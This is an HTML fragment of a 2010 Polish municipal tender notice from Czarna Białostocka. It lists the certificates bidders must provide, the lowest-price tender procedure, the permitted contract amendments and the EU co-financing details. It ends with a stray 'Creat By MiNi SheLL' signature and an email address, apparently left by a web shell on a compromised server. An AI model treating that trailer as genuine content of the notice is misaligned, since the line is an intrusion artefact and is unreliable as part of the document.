<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	formularz ofertowy - wypełniony i podpisany przez Wykonawcę z wykorzystaniem załączonego wzoru;
2)	oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych z wykorzystaniem załączonego wzoru;
3)	jeżeli wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, należy dołączyć pisemne zobowiązania tych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia;
4)	harmonogram rzeczowo-finansowy robót w rozbiciu na etapy i zakresy robót do wykonania w danym kwartale realizacji inwestycji z podaniem kosztów ich wykonania - dla każdego kwartału odrębnie;
5)	zestawienie cen materiałów;
6)	zestawienie cen pracy sprzętu</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmian w zakresie terminu realizacji przedmiotu umowy w przypadku:
1)	wystąpienia okoliczności niezależnych od Wykonawcy przy zachowaniu przez niego należytej staranności, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu zamówienia,
2)	nie przekazania Wykonawcy przez Zamawiającego w terminie terenu budowy lub dokumentów budowy, do których przekazania Zamawiający był zobowiązany,
3)	wstrzymania przez Zamawiającego wykonania robót nie wynikających z okoliczności leżących po stronie Wykonawcy (nie dotyczy okoliczności wstrzymania robót przez inspektorów nadzoru zamawiającego w przypadku stwierdzenia nieprawidłowości zawinionych przez wykonawcę),
4)	konieczności wykonania przez Zamawiającego korekty projektu dla usunięcia wad dostarczonej dokumentacji.
W przypadku zmiany terminu realizacji przedmiotu umowy, o którym mowa w ust. 2, termin ten może ulec przedłużeniu nie dłużej jednak, niż o czas trwania tych okoliczności.
Zamawiający dopuszcza możliwość dokonania zmian w zakresie skrócenia terminu realizacji zamówienia w przypadku stwierdzenia przez Wykonawcę możliwości wcześniejszego wykonania przedmiotu umowy.
Zamawiający nie ma obowiązku przedłużenia terminu wykonania robót, jeżeli Wykonawca w terminie 7 dni  od wystąpienia okoliczności, o których mowa w ust. 1, nie złoży zamawiającemu, na piśmie, uzasadnionego wniosku o przedłużenie terminu wykonania przedmiotu umowy i  nie uzyska  akceptacji tego wniosku.
Zamawiający dopuszcza możliwość zmian w umowie polegających na rozszerzeniu odpowiedzialności z tytułu rękojmi lub przedłużeniu terminu udzielonej gwarancji w przypadku zaproponowania takiego rozwiązania przez wykonawcę.
Zamawiający dopuszcza możliwość zmiany wysokości wynagrodzenia wynikającej z ustalonej obowiązującymi przepisami zmiany stawki podatku VAT.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.czarnabialostocka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Czarnej Białostockiej, 16-020 Czarna Białostocka, ul. R. Traugutta 2, pokój nr 8.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 08.12.2010 godzina 11:00, miejsce: Urząd Miejski w Czarnej Białostockiej, 16-020 Czarna Białostocka, ul. R. Traugutta 2, pokój nr 8.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.	Inwestycja jest współfinansowana ze środków Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Rozwój Polski Wschodniej 2007-2013, projekt pn. Budowa i uruchomienie Podlaskiego Parku Przemysłowego.
2.	Zgodnie z art. 93 ust. 1a ustawy Pzp zamawiający może unieważnić postępowanie o udzielenie zamówienia, jeżeli środki pochodzące z budżetu Unii Europejskiej, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com